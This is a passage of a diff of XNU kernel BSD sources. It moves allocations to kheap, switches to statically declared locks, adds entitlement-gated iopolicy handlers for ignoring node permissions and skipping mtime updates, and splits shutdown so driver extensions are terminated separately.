  * Assertion counts for system properties (add new ones for each new mechanism)
@@ -87,9 +85,6 @@ static int64_t          fast_jetsam_assert_cnt;
 /* Wait Channel for system override */
 static uint64_t         sys_override_wait;
 
-/* Global variable to indicate if system_override is enabled */
-int                     sys_override_enabled;
-
 /* Helper routines */
 static void system_override_begin(uint64_t flags);
 static void system_override_end(uint64_t flags);
@@ -97,17 +92,6 @@ static void system_override_abort(uint64_t flags);
 static void system_override_callouts(uint64_t flags, boolean_t enable_override);
 static __attribute__((noinline)) int PROCESS_OVERRIDING_SYSTEM_DEFAULTS(uint64_t timeout);
 
-void
-init_system_override()
-{
-       sys_override_mtx_grp_attr = lck_grp_attr_alloc_init();
-       sys_override_mtx_grp = lck_grp_alloc_init("system_override", sys_override_mtx_grp_attr);
-       sys_override_mtx_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sys_override_lock, sys_override_mtx_grp, sys_override_mtx_attr);
-       io_throttle_assert_cnt = cpu_throttle_assert_cnt = fast_jetsam_assert_cnt = 0;
-       sys_override_enabled = 1;
-}
-
 /* system call implementation */
 int
 system_override(__unused struct proc *p, struct system_override_args * uap, __unused int32_t *retval)
@@ -127,12 +111,6 @@ system_override(__unused struct proc *p, struct system_override_args * uap, __un
                goto out;
        }
 
-       /* Make sure that the system override syscall has been initialized */
-       if (!sys_override_enabled) {
-               error = EINVAL;
-               goto out;
-       }
-
        lck_mtx_lock(&sys_override_lock);
 
        if (flags & SYS_OVERRIDE_DISABLE) {
index b3470216aefda293a309c0a2843dfb57e2c62e66..31561cf428b46c507e78da98969a8ddf38ee9b88 100644 (file)
@@ -998,8 +998,7 @@ persona_proc_adopt(proc_t p, struct persona *persona, kauth_cred_t auth_override
 
        /* Only Multiuser Mode needs to update the session login name to the persona name */
 #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG);
-       uint32_t multiuser_flags = *multiuser_flag_address;
+       uint32_t multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG);
        /* set the login name of the session */
        if (multiuser_flags) {
                struct session * sessp = proc_session(p);
index 21fa06635fae32a7cfa5bb4a8d5465d302f3e5a3..163122f54158427f6d989471f3ff4bf2dab4aac9 100644 (file)
@@ -190,10 +190,17 @@ __XNU_PRIVATE_EXTERN char corefilename[MAXPATHLEN + 1] = {"/private/var/cores/%N
 #include <kern/backtrace.h>
 #endif
 
+static LCK_MTX_DECLARE_ATTR(proc_klist_mlock, &proc_mlock_grp, &proc_lck_attr);
+
 ZONE_DECLARE(pgrp_zone, "pgrp",
     sizeof(struct pgrp), ZC_ZFREE_CLEARMEM);
 ZONE_DECLARE(session_zone, "session",
     sizeof(struct session), ZC_ZFREE_CLEARMEM);
+/*
+ * If you need accounting for KM_PROC consider using
+ * ZONE_VIEW_DEFINE to define a zone view.
+ */
+#define KM_PROC KHEAP_DEFAULT
 
 typedef uint64_t unaligned_u64 __attribute__((aligned(1)));
 
@@ -282,7 +289,7 @@ again:
                LIST_REMOVE(uip, ui_hash);
                retval = 0;
                proc_list_unlock();
-               FREE(uip, M_PROC);
+               kheap_free(KM_PROC, uip, sizeof(struct uidinfo));
                goto out;
        }
        if (diff <= 0) {
@@ -304,15 +311,13 @@ again:
                goto out;
        }
        proc_list_unlock();
-       MALLOC(newuip, struct uidinfo *, sizeof(*uip), M_PROC, M_WAITOK);
+       newuip = kheap_alloc(KM_PROC, sizeof(struct uidinfo), Z_WAITOK);
        if (newuip == NULL) {
                panic("chgproccnt: M_PROC zone depleted");
        }
        goto again;
 out:
-       if (newuip != NULL) {
-               FREE(newuip, M_PROC);
-       }
+       kheap_free(KM_PROC, newuip, sizeof(struct uidinfo));
        return retval;
 }
 
@@ -596,7 +601,7 @@ retry:
            (((p->p_listflag & (P_LIST_DRAIN | P_LIST_DRAINWAIT)) == 0) ||
            ((p->p_listflag & P_LIST_REFWAIT) != 0))) {
                if ((p->p_listflag & P_LIST_REFWAIT) != 0 && uthread_needs_to_wait_in_proc_refwait()) {
-                       msleep(&p->p_listflag, proc_list_mlock, 0, "proc_refwait", 0);
+                       msleep(&p->p_listflag, &proc_list_mlock, 0, "proc_refwait", 0);
                        /*
                         * the proc might have been recycled since we dropped
                         * the proc list lock, get the proc again.
@@ -648,7 +653,7 @@ again:
 
        /* If someone else is controlling the (unreaped) zombie - wait */
        if ((p->p_listflag & P_LIST_WAITING) != 0) {
-               (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+               (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                goto again;
        }
        p->p_listflag |=  P_LIST_WAITING;
@@ -699,7 +704,7 @@ proc_refdrain_with_refwait(proc_t p, boolean_t get_ref_and_allow_wait)
        /* Do not wait in ref drain for launchd exec */
        while (p->p_refcount && !initexec) {
                p->p_listflag |= P_LIST_DRAINWAIT;
-               msleep(&p->p_refcount, proc_list_mlock, 0, "proc_refdrain", 0);
+               msleep(&p->p_refcount, &proc_list_mlock, 0, "proc_refdrain", 0);
        }
 
        p->p_listflag &= ~P_LIST_DRAIN;
@@ -746,7 +751,7 @@ loop:
 
        if ((pp->p_listflag & (P_LIST_CHILDDRSTART | P_LIST_CHILDDRAINED)) == P_LIST_CHILDDRSTART) {
                pp->p_listflag |= P_LIST_CHILDDRWAIT;
-               msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0);
+               msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0);
                loopcnt++;
                if (loopcnt == 5) {
                        parent = PROC_NULL;
@@ -800,7 +805,7 @@ proc_childdrainstart(proc_t p)
        /* wait for all that hold parentrefs to drop */
        while (p->p_parentref > 0) {
                p->p_listflag |= P_LIST_PARENTREFWAIT;
-               msleep(&p->p_parentref, proc_list_mlock, 0, "proc_childdrainstart", 0);
+               msleep(&p->p_parentref, &proc_list_mlock, 0, "proc_childdrainstart", 0);
        }
 }
 
@@ -857,6 +862,7 @@ int
 proc_pid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_pid;
        }
        return -1;
@@ -866,6 +872,7 @@ int
 proc_ppid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_ppid;
        }
        return -1;
@@ -875,6 +882,7 @@ int
 proc_original_ppid(proc_t p)
 {
        if (p != NULL) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                return p->p_original_ppid;
        }
        return -1;
@@ -913,6 +921,7 @@ int
 proc_csflags(proc_t p, uint64_t *flags)
 {
        if (p && flags) {
+               proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC);
                *flags = (uint64_t)p->p_csflags;
                return 0;
        }
@@ -996,7 +1005,7 @@ loop:
        parent =  proc_ref_locked(pp);
        if ((parent == PROC_NULL) && (pp != PROC_NULL) && (pp->p_stat != SZOMB) && ((pp->p_listflag & P_LIST_EXITED) != 0) && ((pp->p_listflag & P_LIST_CHILDDRAINED) == 0)) {
                pp->p_listflag |= P_LIST_CHILDLKWAIT;
-               msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0);
+               msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0);
                goto loop;
        }
        proc_list_unlock();
@@ -1745,7 +1754,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess)
                        sess->s_count = 1;
                        sess->s_ttypgrpid = NO_PID;
 
-                       lck_mtx_init(&sess->s_mlock, proc_mlock_grp, proc_lck_attr);
+                       lck_mtx_init(&sess->s_mlock, &proc_mlock_grp, &proc_lck_attr);
 
                        bcopy(procsp->s_login, sess->s_login,
                            sizeof(sess->s_login));
@@ -1773,7 +1782,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess)
                }
                pgrp->pg_id = pgid;
 
-               lck_mtx_init(&pgrp->pg_mlock, proc_mlock_grp, proc_lck_attr);
+               lck_mtx_init(&pgrp->pg_mlock, &proc_mlock_grp, &proc_lck_attr);
 
                LIST_INIT(&pgrp->pg_members);
                proc_list_lock();
@@ -1897,13 +1906,13 @@ pgdelete_dropref(struct pgrp *pgrp)
                        panic("pg_deleteref: freeing session in use");
                }
                proc_list_unlock();
-               lck_mtx_destroy(&sessp->s_mlock, proc_mlock_grp);
+               lck_mtx_destroy(&sessp->s_mlock, &proc_mlock_grp);
 
                zfree(session_zone, sessp);
        } else {
                proc_list_unlock();
        }
-       lck_mtx_destroy(&pgrp->pg_mlock, proc_mlock_grp);
+       lck_mtx_destroy(&pgrp->pg_mlock, &proc_mlock_grp);
        zfree(pgrp_zone, pgrp);
 }
 
@@ -2232,6 +2241,18 @@ proc_ignores_content_protection(proc_t p)
        return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION;
 }
 
+bool
+proc_ignores_node_permissions(proc_t p)
+{
+       return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS;
+}
+
+bool
+proc_skip_mtime_update(proc_t p)
+{
+       return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE;
+}
+
 #if CONFIG_COREDUMP
 /*
  * proc_core_name(name, uid, pid)
@@ -2764,7 +2785,7 @@ proc_iterate(
                proc_list_lock();
                pid_count_available = nprocs + 1; /* kernel_task not counted in nprocs */
                assert(pid_count_available > 0);
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                proc_list_unlock();
@@ -2927,7 +2948,7 @@ proc_childrenwalk(
                        proc_list_unlock();
                        goto out;
                }
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                proc_list_unlock();
@@ -3008,7 +3029,7 @@ pgrp_iterate(
                        }
                        goto out;
                }
-               if (pidlist_nalloc(pl) > pid_count_available) {
+               if (pidlist_nalloc(pl) >= pid_count_available) {
                        break;
                }
                pgrp_unlock(pgrp);
@@ -3166,7 +3187,7 @@ pgrp_replace(struct proc * p, struct pgrp * newpg)
 
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        p->p_listflag |= P_LIST_PGRPTRANS;
@@ -3276,7 +3297,7 @@ proc_pgrp(proc_t p)
 
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        pgrp = p->p_pgrp;
@@ -3328,7 +3349,7 @@ proc_session(proc_t p)
        /* wait during transitions */
        while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) {
                p->p_listflag |= P_LIST_PGRPTRWAIT;
-               (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0);
+               (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0);
        }
 
        if ((p->p_pgrp != PGRP_NULL) && ((sess = p->p_pgrp->pg_session) != SESSION_NULL)) {
@@ -3356,7 +3377,7 @@ session_rele(struct session *sess)
                        panic("session_rele: freeing session in use");
                }
                proc_list_unlock();
-               lck_mtx_destroy(&sess->s_mlock, proc_mlock_grp);
+               lck_mtx_destroy(&sess->s_mlock, &proc_mlock_grp);
                zfree(session_zone, sess);
        } else {
                proc_list_unlock();
@@ -3451,13 +3472,13 @@ proc_transwait(proc_t p, int locked)
 void
 proc_klist_lock(void)
 {
-       lck_mtx_lock(proc_klist_mlock);
+       lck_mtx_lock(&proc_klist_mlock);
 }
 
 void
 proc_klist_unlock(void)
 {
-       lck_mtx_unlock(proc_klist_mlock);
+       lck_mtx_unlock(&proc_klist_mlock);
 }
 
 void
index d689b70d57533a8fb2aa594c69b82f37823c3fef..6a0b8edeed5689a2d3aa0ac955ecd84b6fed6d7c 100644 (file)
  * result.
  *
  * Note:       Does *NOT* currently include per-thread credential changes
- *
- *             We don't use kauth_cred_print() in current debugging, but it
- *             can be used if needed when debugging is active.
  */
 #if DEBUG_CRED
 #define DEBUG_CRED_ENTER                printf
 #define DEBUG_CRED_CHANGE               printf
-extern void kauth_cred_print(kauth_cred_t cred);
 #else   /* !DEBUG_CRED */
 #define DEBUG_CRED_ENTER(fmt, ...)      do {} while (0)
 #define DEBUG_CRED_CHANGE(fmt, ...)     do {} while (0)
index 6628465844c776d221c0503849a770705f7332d6..65c6d020ccb15afd8532fc69588f3c865b2a70c8 100644 (file)
@@ -1614,6 +1614,10 @@ static int
 iopolicysys_vfs_trigger_resolve(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
 static int
 iopolicysys_vfs_ignore_content_protection(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
+static int
+iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *ipo_param);
+static int
+iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param);
 
 /*
  * iopolicysys
@@ -1684,6 +1688,18 @@ iopolicysys(struct proc *p, struct iopolicysys_args *uap, int32_t *retval)
                        goto out;
                }
                break;
+       case IOPOL_TYPE_VFS_IGNORE_PERMISSIONS:
+               error = iopolicysys_vfs_ignore_node_permissions(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param);
+               if (error) {
+                       goto out;
+               }
+               break;
+       case IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE:
+               error = iopolicysys_vfs_skip_mtime_update(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param);
+               if (error) {
+                       goto out;
+               }
+               break;
        default:
                error = EINVAL;
                goto out;
@@ -2289,6 +2305,104 @@ out:
        return error;
 }
 
+#define AUTHORIZED_ACCESS_ENTITLEMENT \
+       "com.apple.private.vfs.authorized-access"
+int
+iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope,
+    int policy, __unused struct _iopol_param_t *iop_param)
+{
+       int error = EINVAL;
+
+       switch (scope) {
+       case IOPOL_SCOPE_PROCESS:
+               break;
+       default:
+               goto out;
+       }
+
+       switch (cmd) {
+       case IOPOL_CMD_GET:
+               policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS ?
+                   IOPOL_VFS_IGNORE_PERMISSIONS_ON : IOPOL_VFS_IGNORE_PERMISSIONS_OFF;
+               iop_param->iop_policy = policy;
+               goto out_ok;
+       case IOPOL_CMD_SET:
+               /* SET is handled after the switch */
+               break;
+       default:
+               goto out;
+       }
+
+       if (!IOTaskHasEntitlement(current_task(), AUTHORIZED_ACCESS_ENTITLEMENT)) {
+               error = EPERM;
+               goto out;
+       }
+
+       switch (policy) {
+       case IOPOL_VFS_IGNORE_PERMISSIONS_OFF:
+               os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed);
+               break;
+       case IOPOL_VFS_IGNORE_PERMISSIONS_ON:
+               os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed);
+               break;
+       default:
+               break;
+       }
+
+out_ok:
+       error = 0;
+out:
+       return error;
+}
+
+#define SKIP_MTIME_UPDATE_ENTITLEMENT \
+       "com.apple.private.vfs.skip-mtime-updates"
+int
+iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope,
+    int policy, __unused struct _iopol_param_t *iop_param)
+{
+       int error = EINVAL;
+
+       switch (scope) {
+       case IOPOL_SCOPE_PROCESS:
+               break;
+       default:
+               goto out;
+       }
+
+       switch (cmd) {
+       case IOPOL_CMD_GET:
+               policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE ?
+                   IOPOL_VFS_SKIP_MTIME_UPDATE_ON : IOPOL_VFS_SKIP_MTIME_UPDATE_OFF;
+               iop_param->iop_policy = policy;
+               goto out_ok;
+       case IOPOL_CMD_SET:
+               break;
+       default:
+               break;
+       }
+
+       if (!IOTaskHasEntitlement(current_task(), SKIP_MTIME_UPDATE_ENTITLEMENT)) {
+               error = EPERM;
+               goto out;
+       }
+
+       switch (policy) {
+       case IOPOL_VFS_SKIP_MTIME_UPDATE_OFF:
+               os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed);
+               break;
+       case IOPOL_VFS_SKIP_MTIME_UPDATE_ON:
+               os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed);
+               break;
+       default:
+               break;
+       }
+
+out_ok:
+       error = 0;
+out:
+       return error;
+}
 /* BSD call back function for task_policy networking changes */
 void
 proc_apply_task_networkbg(void * bsd_info, thread_t thread)
index 3bd774db5e2dbc530ba01bd8ae1d0cdc8938f1e3..e723f89a26af56dc60c7936586a3407bd0cfd911 100644 (file)
@@ -67,6 +67,7 @@
 #include <kern/clock.h>                 /* for delay_for_interval() */
 #include <libkern/OSAtomic.h>
 #include <IOKit/IOPlatformExpert.h>
+#include <IOKit/IOMessage.h>
 
 #include <sys/kdebug.h>
 
@@ -82,7 +83,7 @@ unsigned int proc_shutdown_exitcount = 0;
 static int  sd_openlog(vfs_context_t);
 static int  sd_closelog(vfs_context_t);
 static void sd_log(vfs_context_t, const char *, ...);
-static void proc_shutdown(void);
+static void proc_shutdown(int only_non_dext);
 static void zprint_panic_info(void);
 extern void halt_log_enter(const char * what, const void * pc, uint64_t time);
 
@@ -93,6 +94,7 @@ extern boolean_t kdp_has_polled_corefile(void);
 struct sd_filterargs {
        int delayterm;
        int shutdownstate;
+       int only_non_dext;
 };
 
 
@@ -113,7 +115,7 @@ static int sd_callback1(proc_t p, void * arg);
 static int sd_callback2(proc_t p, void * arg);
 static int sd_callback3(proc_t p, void * arg);
 
-extern boolean_t panic_include_zprint;
+extern bool panic_include_zprint;
 extern mach_memory_info_t *panic_kext_memory_info;
 extern vm_size_t panic_kext_memory_size;
 
@@ -217,7 +219,7 @@ reboot_kernel(int howto, char *message)
                /* handle live procs (deallocate their root and current directories), suspend initproc */
 
                startTime = mach_absolute_time();
-               proc_shutdown();
+               proc_shutdown(TRUE);
                halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime);
 
 #if CONFIG_AUDIT
@@ -252,10 +254,27 @@ reboot_kernel(int howto, char *message)
 #endif /* DEVELOPMENT || DEBUG */
                {
                        startTime = mach_absolute_time();
-                       vfs_unmountall();
+                       vfs_unmountall(TRUE);
                        halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime);
                }
 
+               IOSystemShutdownNotification(kIOSystemShutdownNotificationTerminateDEXTs);
+
+               startTime = mach_absolute_time();
+               proc_shutdown(FALSE);
+               halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime);
+
+#if DEVELOPMENT || DEBUG
+               if (!(howto & RB_PANIC) || !kdp_has_polled_corefile())
+#endif /* DEVELOPMENT || DEBUG */
+               {
+                       startTime = mach_absolute_time();
+                       vfs_unmountall(FALSE);
+                       halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime);
+               }
+
+
+
                /* Wait for the buffer cache to clean remaining dirty buffers */
                startTime = mach_absolute_time();
                for (iter = 0; iter < 100; iter++) {
@@ -334,6 +353,7 @@ sd_closelog(vfs_context_t ctx)
        if (sd_logvp != NULLVP) {
                VNOP_FSYNC(sd_logvp, MNT_WAIT, ctx);
                error = vnode_close(sd_logvp, FWRITE, ctx);
+               sd_logvp = NULLVP;
        }
 
        return error;
@@ -365,6 +385,8 @@ sd_log(vfs_context_t ctx, const char *fmt, ...)
        va_end(arglist);
 }
 
+#define proc_is_driver(p) (task_is_driver((p)->task))
+
 static int
 sd_filt1(proc_t p, void * args)
 {
@@ -373,6 +395,10 @@ sd_filt1(proc_t p, void * args)
        int delayterm = sf->delayterm;
        int shutdownstate = sf->shutdownstate;
 
+       if (sf->only_non_dext && proc_is_driver(p)) {
+               return 0;
+       }
+
        if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0)
            || (p == self) || (p->p_stat == SZOMB)
            || (p->p_shutdownstate != shutdownstate)
@@ -403,7 +429,9 @@ sd_callback1(proc_t p, void * args)
                        proc_shutdown_exitcount++;
                        proc_list_unlock();
                }
-
+               if (proc_is_driver(p)) {
+                       printf("lingering dext %s signal(%d)\n", p->p_name, signo);
+               }
                psignal(p, signo);
                if (countproc != 0) {
                        sd->activecount++;
@@ -423,6 +451,10 @@ sd_filt2(proc_t p, void * args)
        int delayterm = sf->delayterm;
        int shutdownstate = sf->shutdownstate;
 
+       if (sf->only_non_dext && proc_is_driver(p)) {
+               return 0;
+       }
+
        if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0)
            || (p == self) || (p->p_stat == SZOMB)
            || (p->p_shutdownstate == shutdownstate)
@@ -451,6 +483,9 @@ sd_callback2(proc_t p, void * args)
                        proc_shutdown_exitcount++;
                        proc_list_unlock();
                }
+               if (proc_is_driver(p)) {
+                       printf("lingering dext %s signal(%d)\n", p->p_name, signo);
+               }
                psignal(p, signo);
                if (countproc != 0) {
                        sd->activecount++;
@@ -517,7 +552,7 @@ sd_callback3(proc_t p, void * args)
  */
 
 static void
-proc_shutdown(void)
+proc_shutdown(int only_non_dext)
 {
        vfs_context_t ctx = vfs_context_current();
        struct proc *p, *self;
@@ -550,6 +585,7 @@ sigterm_loop:
         */
        sfargs.delayterm = delayterm;
        sfargs.shutdownstate = 0;
+       sfargs.only_non_dext = only_non_dext;
        sdargs.signo = SIGTERM;
        sdargs.setsdstate = 1;
        sdargs.countproc = 1;
@@ -569,7 +605,7 @@ sigterm_loop:
                         */
                        ts.tv_sec = 3;
                        ts.tv_nsec = 0;
-                       error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts);
+                       error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts);
                        if (error != 0) {
                                for (p = allproc.lh_first; p; p = p->p_list.le_next) {
                                        if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) {
@@ -628,7 +664,7 @@ sigterm_loop:
                         */
                        ts.tv_sec = 10;
                        ts.tv_nsec = 0;
-                       error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts);
+                       error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts);
                        if (error != 0) {
                                for (p = allproc.lh_first; p; p = p->p_list.le_next) {
                                        if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) {
@@ -686,6 +722,10 @@ sigterm_loop:
 
        sd_closelog(ctx);
 
+       if (only_non_dext) {
+               return;
+       }
+
        /*
         * Now that all other processes have been terminated, suspend init
         */
index 3c9cb1feeafde64a6ff73d80d613ef57a0cc6543..74ecaf33814a9b23939dc2c5f31db2fe04b8ed97 100644 (file)
@@ -3252,7 +3252,6 @@ postsig_locked(int signum)
                 * Default catcher, where the default is to kill
                 * the process.  (Other cases were ignored above.)
                 */
-               sig_lock_to_exit(p);
 
                /*
                 * exit_with_reason() below will consume a reference to the thread's exit reason, so we take another
index 4c07b8ce950038c37d25877db5aeb37e2f323562..1534078992e2d20822aab187c6152c4be4e67a2b 100644 (file)
 #include <sys/memory_maintenance.h>
 #include <sys/priv.h>
 #include <stdatomic.h>
+#include <uuid/uuid.h>
 
 #include <security/audit/audit.h>
 #include <kern/kalloc.h>
@@ -189,6 +190,7 @@ extern unsigned int speculative_prefetch_max_iosize;
 extern unsigned int preheat_max_bytes;
 extern unsigned int preheat_min_bytes;
 extern long numvnodes;
+extern long freevnodes;
 extern long num_recycledvnodes;
 
 extern uuid_string_t bootsessionuuid_string;
@@ -449,6 +451,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
        host_basic_info_data_t hinfo;
        kern_return_t kret;
        uint32_t size;
+       uint32_t buf_size = 0;
        int changed;
        mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
        struct _processor_statistics_np *buf;
@@ -465,7 +468,8 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
                return EINVAL;
        }
 
-       MALLOC(buf, struct _processor_statistics_np*, size, M_TEMP, M_ZERO | M_WAITOK);
+       buf_size = size;
+       buf = kheap_alloc(KHEAP_TEMP, buf_size, Z_ZERO | Z_WAITOK);
 
        kret = get_sched_statistics(buf, &size);
        if (kret != KERN_SUCCESS) {
@@ -482,7 +486,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus
                panic("Sched info changed?!");
        }
 out:
-       FREE(buf, M_TEMP);
+       kheap_free(KHEAP_TEMP, buf, buf_size);
        return error;
 }
 
@@ -531,11 +535,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
        __unused int cmd = oidp->oid_arg2;      /* subcommand*/
        __unused int *name = arg1;      /* oid element argument vector */
        __unused int namelen = arg2;    /* number of oid element arguments */
-       user_addr_t oldp = req->oldptr; /* user buffer copy out address */
-       size_t *oldlenp = &req->oldlen; /* user buffer copy out size */
-       user_addr_t newp = req->newptr; /* user buffer copy in address */
-       size_t newlen = req->newlen;    /* user buffer copy in size */
-       int error;
+       int error, changed;
 
        int tmp;
 
@@ -547,16 +547,17 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
         * for example, to dump current counts:
         *              sysctl -w kern.count_calls=2
         */
-       error = sysctl_int(oldp, oldlenp, newp, newlen, &tmp);
-       if (error != 0) {
+       error = sysctl_io_number(req, do_count_syscalls,
+           sizeof(do_count_syscalls), &tmp, &changed);
+
+       if (error != 0 || !changed) {
                return error;
        }
 
        if (tmp == 1) {
                do_count_syscalls = 1;
        } else if (tmp == 0 || tmp == 2 || tmp == 3) {
-               int                     i;
-               for (i = 0; i < nsysent; i++) {
+               for (int i = 0; i < nsysent; i++) {
                        if (syscalls_log[i] != 0) {
                                if (tmp == 2) {
                                        printf("%d calls - name %s \n", syscalls_log[i], syscallnames[i]);
@@ -565,14 +566,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS
                                }
                        }
                }
-               if (tmp != 0) {
-                       do_count_syscalls = 1;
-               }
-       }
-
-       /* adjust index so we return the right required/consumed amount */
-       if (!error) {
-               req->oldidx += req->oldlen;
+               do_count_syscalls = (tmp != 0);
        }
 
        return error;
@@ -595,65 +589,6 @@ SYSCTL_PROC(_kern, KERN_COUNT_SYSCALLS, count_syscalls, CTLTYPE_NODE | CTLFLAG_R
  * instead.
  */
 
-/*
- * Validate parameters and get old / set new parameters
- * for an integer-valued sysctl function.
- */
-int
-sysctl_int(user_addr_t oldp, size_t *oldlenp,
-    user_addr_t newp, size_t newlen, int *valp)
-{
-       int error = 0;
-
-       if (oldp != USER_ADDR_NULL && oldlenp == NULL) {
-               return EFAULT;
-       }
-       if (oldp && *oldlenp < sizeof(int)) {
-               return ENOMEM;
-       }
-       if (newp && newlen != sizeof(int)) {
-               return EINVAL;
-       }
-       *oldlenp = sizeof(int);
-       if (oldp) {
-               error = copyout(valp, oldp, sizeof(int));
-       }
-       if (error == 0 && newp) {
-               error = copyin(newp, valp, sizeof(int));
-               AUDIT_ARG(value32, *valp);
-       }
-       return error;
-}
-
-/*
- * Validate parameters and get old / set new parameters
- * for an quad(64bit)-valued sysctl function.
- */
-int
-sysctl_quad(user_addr_t oldp, size_t *oldlenp,
-    user_addr_t newp, size_t newlen, quad_t *valp)
-{
-       int error = 0;
-
-       if (oldp != USER_ADDR_NULL && oldlenp == NULL) {
-               return EFAULT;
-       }
-       if (oldp && *oldlenp < sizeof(quad_t)) {
-               return ENOMEM;
-       }
-       if (newp && newlen != sizeof(quad_t)) {
-               return EINVAL;
-       }
-       *oldlenp = sizeof(quad_t);
-       if (oldp) {
-               error = copyout(valp, oldp, sizeof(quad_t));
-       }
-       if (error == 0 && newp) {
-               error = copyin(newp, valp, sizeof(quad_t));
-       }
-       return error;
-}
-
 STATIC int
 sysdoproc_filt_KERN_PROC_PID(proc_t p, void * arg)
 {
@@ -2290,6 +2225,9 @@ SYSCTL_INT(_kern, OID_AUTO, num_taskthreads,
 SYSCTL_LONG(_kern, OID_AUTO, num_recycledvnodes,
     CTLFLAG_RD | CTLFLAG_LOCKED,
     &num_recycledvnodes, "");
+SYSCTL_COMPAT_INT(_kern, OID_AUTO, free_vnodes,
+    CTLFLAG_RD | CTLFLAG_LOCKED,
+    &freevnodes, 0, "");
 
 STATIC int
 sysctl_maxvnodes(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
@@ -3434,8 +3372,9 @@ SYSCTL_PROC(_debug,
 #include <mach/task.h>
 #include <mach/semaphore.h>
 
-extern lck_grp_t * sysctl_debug_test_stackshot_owner_grp; /* used for both mutexes and rwlocks */
-extern lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; /* used to protect lck_*_init */
